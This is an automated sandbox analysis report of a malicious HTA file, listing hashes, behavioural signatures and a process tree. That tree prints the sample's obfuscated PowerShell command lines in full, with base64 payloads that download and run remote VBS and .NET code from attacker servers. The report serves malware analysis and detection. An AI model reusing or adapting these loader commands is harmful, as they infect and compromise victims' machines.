Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Resource
win10v2004-20241007-en
General
-
Target
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
-
Size
207KB
-
MD5
1cc49542b6408627091678140cb916c9
-
SHA1
66e198338df798a6ef051a71feee749bae890a6d
-
SHA256
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
-
SHA512
1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b
-
SSDEEP
96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
pOWeRSheLl.EXEflow pid Process 15 2140 pOWeRSheLl.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 3136 powershell.exe 3260 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepid Process 2140 pOWeRSheLl.EXE 2312 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeWScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WScript.exepowershell.exepowershell.exemshta.exepOWeRSheLl.EXEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSheLl.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Modifies registry class 1 IoCs
Processes:
pOWeRSheLl.EXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings pOWeRSheLl.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepowershell.exepowershell.exepid Process 2140 pOWeRSheLl.EXE 2140 pOWeRSheLl.EXE 2312 powershell.exe 2312 powershell.exe 3136 powershell.exe 3136 powershell.exe 3260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2140 pOWeRSheLl.EXE Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
mshta.exepOWeRSheLl.EXEcsc.exeWScript.exepowershell.exedescription pid Process procid_target PID 2484 wrote to memory of 2140 2484 mshta.exe 86 PID 2484 wrote to memory of 2140 2484 mshta.exe 86 PID 2484 wrote to memory of 2140 2484 mshta.exe 86 PID 2140 wrote to memory of 2312 2140 pOWeRSheLl.EXE 88 PID 2140 wrote to memory of 2312 2140 pOWeRSheLl.EXE 88 PID 2140 wrote to memory of 2312 2140 pOWeRSheLl.EXE 88 PID 2140 wrote to memory of 1888 2140 pOWeRSheLl.EXE 93 PID 2140 wrote to memory of 1888 2140 pOWeRSheLl.EXE 93 PID 2140 wrote to memory of 1888 2140 pOWeRSheLl.EXE 93 PID 1888 wrote to memory of 3180 1888 csc.exe 94 PID 1888 wrote to memory of 3180 1888 csc.exe 94 PID 1888 wrote to memory of 3180 1888 csc.exe 94 PID 2140 wrote to memory of 396 2140 pOWeRSheLl.EXE 96 PID 2140 wrote to memory of 396 2140 pOWeRSheLl.EXE 96 PID 2140 wrote to memory of 396 2140 pOWeRSheLl.EXE 96 PID 396 wrote to memory of 3136 396 WScript.exe 97 PID 396 wrote to memory of 3136 396 WScript.exe 97 PID 396 wrote to memory of 3136 396 WScript.exe 97 PID 3136 wrote to memory of 3260 3136 powershell.exe 101 PID 3136 wrote to memory of 3260 3136 powershell.exe 101 PID 3136 wrote to memory of 3260 3136 powershell.exe 101
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8685.tmp" "c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD57ade4eac19edec129ed9db85cb5532a7
SHA10391739389af7215368f628538e216b5dceda076
SHA25682ece7dda590f669ba419ebb5b424e72fd7cada67158c5afe779007405425bf6
SHA512ce25a5f48e2b58c6e806243252cccd6122498ba9194d502af273aec0035c4f772a41ce97849b3dcbce0fb213dfafdade12f4535ec8ce0de4c1b5beb68231d83c
-
Filesize
3KB
MD59fe79efa6323525225d363ace15df72f
SHA1e5e5ef02040b9f7c27e4ffcbd098112a3e8c6473
SHA25605f17359cc26de9edbd500ac70a7b6d4740771050b44b6335e2f8fc3ba41e9d5
SHA5123cf16f9bb2d642882b960149361169d48f54f37b0b6231f9142e5fb373a3238bdc44b01db21cc112858e43e2e3a8f4383beab50e5765f2d4f2d139fe9bf783b4
-
Filesize
1KB
MD5d8aa2f25f919a326f53874af42a320c6
SHA19b820a7d273dcc84f2e2acf0012d0dde5d3339b0
SHA256e2dbd0364a0a5849588594d8e6882d2688ba158a0facc5e3b7d375a022856741
SHA512d210ca2a0334023e9c99b77b619ee9862ffab94f5cc77b509a99cd4b008709ddae7c23565e8675baba6fdb901eff14a16d0669be307f410594b39564ce25e8ad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
138KB
MD54f46597a54e903c400cac4db5a222ecb
SHA10a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a
-
Filesize
483B
MD50b9734ed54c4f41d0c94957b007eb3d5
SHA1ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA25636632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17
-
Filesize
369B
MD5a7e015ee5f79210a63dba811dfb28e78
SHA1b9d2ca819d228b8b57022245f8ae3b64ac9e6b21
SHA2564f3850a9002617f568507a7f35d341c4af517db9cde1cb385a39a1aea4ebea41
SHA51273c24f9ac50e0f1edd2487b89340c9e4f32e13d1f249b0e86fe2a778806e8ee649c40d09ec6c403cc97fea23f33949b22d1e4a10fbb6a099543df861814d410b
-
Filesize
652B
MD51b25fdc46469068a40fa6184405e4346
SHA119e31ce6770008877096fbbe5b6e25fe68065947
SHA256447dd2d370612b55bcf7ce2de965c1e5ea91527b14b14c01e256dbee4d18ea3f
SHA5124f00b01776650c7d24cc0a1b5152b00b36c5832bc82abf74e4fb34b27a9d77a72b8adf3243dd6cf2030c3231571b266f7123d786785b1fd3f023819f66ea6edf